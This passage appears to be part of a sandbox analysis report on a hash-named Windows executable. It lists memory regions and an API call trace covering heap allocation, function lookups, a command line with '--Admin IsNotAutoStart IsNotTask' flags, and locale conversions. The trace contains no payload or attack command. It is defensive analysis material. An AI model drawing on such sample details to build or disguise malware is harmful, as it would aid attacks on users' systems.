end_va = 0x75542fff monitored = 0 entry_point = 0x754c23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1154 start_va = 0x660000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1155 start_va = 0x71da0000 end_va = 0x71e1cfff monitored = 0 entry_point = 0x71da166a region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll") Region: id = 1156 start_va = 0x2660000 end_va = 0x2660fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1157 start_va = 0x26c0000 end_va = 0x26c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1158 start_va = 0x2660000 end_va = 0x2660fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1159 start_va = 0x26c0000 end_va = 0x26c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1160 start_va = 0x732e0000 end_va = 0x7330efff monitored = 0 entry_point = 0x732e1142 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 1161 start_va = 0x2800000 end_va = 0x283ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 1162 start_va = 0x2f20000 end_va = 0x911ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f20000" filename = "" Region: id = 1163 start_va = 0x71e40000 end_va = 0x71e51fff monitored = 0 entry_point = 0x71e43271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 1164 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 1165 start_va = 0x2840000 end_va = 0x287ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 1166 start_va = 0x9120000 end_va = 0xf31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009120000" filename = "" Region: id = 1167 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 1168 start_va = 0x26c0000 end_va = 0x26d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 1169 start_va = 0x739b0000 end_va = 0x739c2fff monitored = 0 entry_point = 0x739b1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1170 start_va = 0x650000 end_va = 0x650fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mpr.dll.mui") Region: id = 1171 start_va = 0x2840000 end_va = 0x287ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 1172 start_va = 0x2d30000 end_va = 0x2d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 1173 start_va = 0x2e00000 end_va = 0x2e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 1174 start_va = 0x9120000 end_va = 0x921ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009120000" filename = "" Region: id = 1175 start_va = 0x9220000 end_va = 0x931ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009220000" filename = "" Region: id = 1176 start_va = 0x7ef9b000 end_va = 0x7ef9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 1177 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 1178 start_va = 0x74920000 end_va = 0x74927fff monitored = 0 entry_point = 0x74921356 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: "c:\\windows\\syswow64\\drprov.dll") Region: id = 1179 start_va = 0x73350000 end_va = 0x73378fff monitored = 0 entry_point = 0x73356b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 1180 start_va = 0x71e00000 end_va = 0x71e13fff monitored = 0 entry_point = 0x71e015c9 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 1181 start_va = 0x71de0000 end_va = 0x71df6fff monitored = 0 entry_point = 0x71de1549 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 1182 start_va = 0x71dd0000 end_va = 0x71dd7fff monitored = 0 entry_point = 0x71dd3c87 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 1183 start_va = 0x71dc0000 end_va = 0x71dcefff monitored = 0 entry_point = 0x71dc12a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 1184 start_va = 0x71db0000 end_va = 0x71dbafff monitored = 0 entry_point = 0x71db1200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 1185 start_va = 0x71da0000 end_va = 0x71da8fff monitored = 0 entry_point = 0x71da15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 1186 start_va = 0x71d90000 end_va = 0x71d9cfff monitored = 0 entry_point = 0x71d912d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 1323 start_va = 0x2f20000 end_va = 0x384ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1324 start_va = 0x2d70000 end_va = 0x2deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d70000" filename = "" Thread: id = 64 os_tid = 0xf68 [0095.938] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x9f664220, dwHighDateTime=0x1d8a8ba)) [0095.938] GetCurrentThreadId () returned 0xf68 [0095.938] GetCurrentProcessId () returned 0xf64 [0095.938] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=1631515250058) returned 1 [0095.974] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x76f1fd35, hStdError=0x76f87daf)) [0095.982] GetProcessHeap () returned 0x670000 [0096.097] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x752b0000 [0096.097] GetProcAddress (hModule=0x752b0000, lpProcName="FlsAlloc") returned 0x752c4ee3 [0096.098] GetProcAddress (hModule=0x752b0000, lpProcName="FlsFree") returned 0x752c354f [0096.098] GetProcAddress (hModule=0x752b0000, lpProcName="FlsGetValue") returned 0x752c1252 [0096.098] GetProcAddress (hModule=0x752b0000, lpProcName="FlsSetValue") returned 0x752c41c0 [0096.098] GetProcAddress (hModule=0x752b0000, lpProcName="InitializeCriticalSectionEx") returned 0x752c4ce0 [0096.098] GetProcAddress (hModule=0x752b0000, lpProcName="CreateEventExW") returned 0x753446ab [0096.098] GetProcAddress (hModule=0x752b0000, lpProcName="CreateSemaphoreExW") returned 0x75344735 [0096.098] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadStackGuarantee") returned 0x752cd2d7 [0096.098] GetProcAddress (hModule=0x752b0000, lpProcName="CreateThreadpoolTimer") returned 0x752dee4e [0096.098] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadpoolTimer") returned 0x76f4441c [0096.099] GetProcAddress (hModule=0x752b0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x76f6c50e [0096.099] GetProcAddress (hModule=0x752b0000, lpProcName="CloseThreadpoolTimer") returned 0x76f6c381 [0096.099] GetProcAddress (hModule=0x752b0000, lpProcName="CreateThreadpoolWait") returned 0x752df058 [0096.099] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadpoolWait") returned 0x76f505d7 [0096.099] GetProcAddress (hModule=0x752b0000, lpProcName="CloseThreadpoolWait") returned 0x76f6ca24 [0096.099] GetProcAddress (hModule=0x752b0000, lpProcName="FlushProcessWriteBuffers") returned 0x76f20b8c [0096.099] GetProcAddress (hModule=0x752b0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x76fdfde8 [0096.099] GetProcAddress (hModule=0x752b0000, lpProcName="GetCurrentProcessorNumber") returned 0x76f71e1d [0096.099] GetProcAddress (hModule=0x752b0000, lpProcName="GetLogicalProcessorInformation") returned 0x75344d01 [0096.099] GetProcAddress (hModule=0x752b0000, lpProcName="CreateSymbolicLinkW") returned 0x7533d181 [0096.100] GetProcAddress (hModule=0x752b0000, lpProcName="SetDefaultDllDirectories") returned 0x753d208a [0096.100] GetProcAddress (hModule=0x752b0000, lpProcName="EnumSystemLocalesEx") returned 0x753447ef [0096.100] GetProcAddress (hModule=0x752b0000, lpProcName="CompareStringEx") returned 0x75344c51 [0096.100] GetProcAddress (hModule=0x752b0000, lpProcName="GetDateFormatEx") returned 0x75356c26 [0096.100] GetProcAddress (hModule=0x752b0000, lpProcName="GetLocaleInfoEx") returned 0x75344cf1 [0096.100] GetProcAddress (hModule=0x752b0000, lpProcName="GetTimeFormatEx") returned 0x75356ba1 [0096.100] GetProcAddress (hModule=0x752b0000, lpProcName="GetUserDefaultLocaleName") returned 0x75344d61 [0096.100] GetProcAddress (hModule=0x752b0000, lpProcName="IsValidLocaleName") returned 0x75344d81 [0096.100] GetProcAddress (hModule=0x752b0000, lpProcName="LCMapStringEx") returned 0x75344d91 [0096.100] GetProcAddress (hModule=0x752b0000, lpProcName="GetCurrentPackageId") returned 0x0 [0096.101] GetProcAddress (hModule=0x752b0000, lpProcName="GetTickCount64") returned 0x752deeb0 [0096.101] GetProcAddress (hModule=0x752b0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0096.101] GetProcAddress (hModule=0x752b0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0096.101] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x3bc) returned 0x68f228 [0096.102] GetCurrentThreadId () returned 0xf68 [0096.128] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x18) returned 0x681a00 [0096.129] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x800) returned 0x68f5f0 [0096.129] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x435de6db, hStdError=0x0)) [0096.129] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0096.129] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0096.129] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0096.129] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --Admin IsNotAutoStart IsNotTask" [0096.129] GetEnvironmentStringsW () returned 0x68fdf8* [0096.129] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xb0e) returned 0x690910 [0096.156] FreeEnvironmentStringsW (penv=0x68fdf8) returned 1 [0096.185] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe")) returned 0x5f [0096.185] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x116) returned 0x68fdf8 [0096.185] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x98) returned 0x68ff18 [0096.185] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x3e) returned 0x682448 [0096.185] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x56) returned 0x68ffb8 [0096.185] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x6e) returned 0x690018 [0096.185] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x78) returned 0x67fb98 [0096.185] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x62) returned 0x690090 [0096.185] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x30) returned 0x68b2d8 [0096.185] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x48) returned 0x686df0 [0096.185] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x28) returned 0x68acd0 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1a) returned 0x68eae0 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x34) returned 0x681a20 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x5c) returned 0x690100 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x32) returned 0x690168 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x2e) returned 0x68b310 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1c) returned 0x68eb08 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x12a) returned 0x6901a8 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x7c) returned 0x6902e0 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x36) returned 0x690368 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x3a) returned 0x682490 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x90) returned 0x6903a8 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x24) returned 0x68ad00 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x30) returned 0x68b348 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x36) returned 0x690440 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x48) returned 0x686e40 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x52) returned 0x690480 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x3c) returned 0x6824d8 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xd6) returned 0x6904e0 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x2e) returned 0x68b380 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1e) returned 0x68eb30 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x2c) returned 0x68b3b8 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x54) returned 0x6905c0 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x52) returned 0x690620 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x2c) returned 0x68b3f0 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x26) returned 0x68ad30 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x3e) returned 0x682520 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x24) returned 0x68ad60 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x30) returned 0x68b428 [0096.186] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x8c) returned 0x690680 [0096.187] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x670000) returned 1 [0096.232] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x800) returned 0x690718 [0096.267] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x80) returned 0x690f20 [0096.267] GetLastError () returned 0x0 [0096.267] SetLastError (dwErrCode=0x0) [0096.267] GetLastError () returned 0x0 [0096.267] SetLastError (dwErrCode=0x0) [0096.267] GetLastError () returned 0x0 [0096.267] SetLastError (dwErrCode=0x0) [0096.267] GetACP () returned 0x4e4 [0096.267] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x220) returned 0x690fa8 [0096.267] GetLastError () returned 0x0 [0096.267] SetLastError (dwErrCode=0x0) [0096.267] IsValidCodePage (CodePage=0x4e4) returned 1 [0096.267] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0096.300] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0096.309] GetLastError () returned 0x0 [0096.309] SetLastError (dwErrCode=0x0) [0096.309] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0096.319] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0096.319] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0096.319] GetLastError () returned 0x0 [0096.319] SetLastError (dwErrCode=0x0) [0096.319] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0096.319] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0096.330] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0096.330] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0096.330] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿKç]Cäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0096.330] GetLastError () returned 0x0 [0096.330] SetLastError (dwErrCode=0x0) [0096.330] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0096.330] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 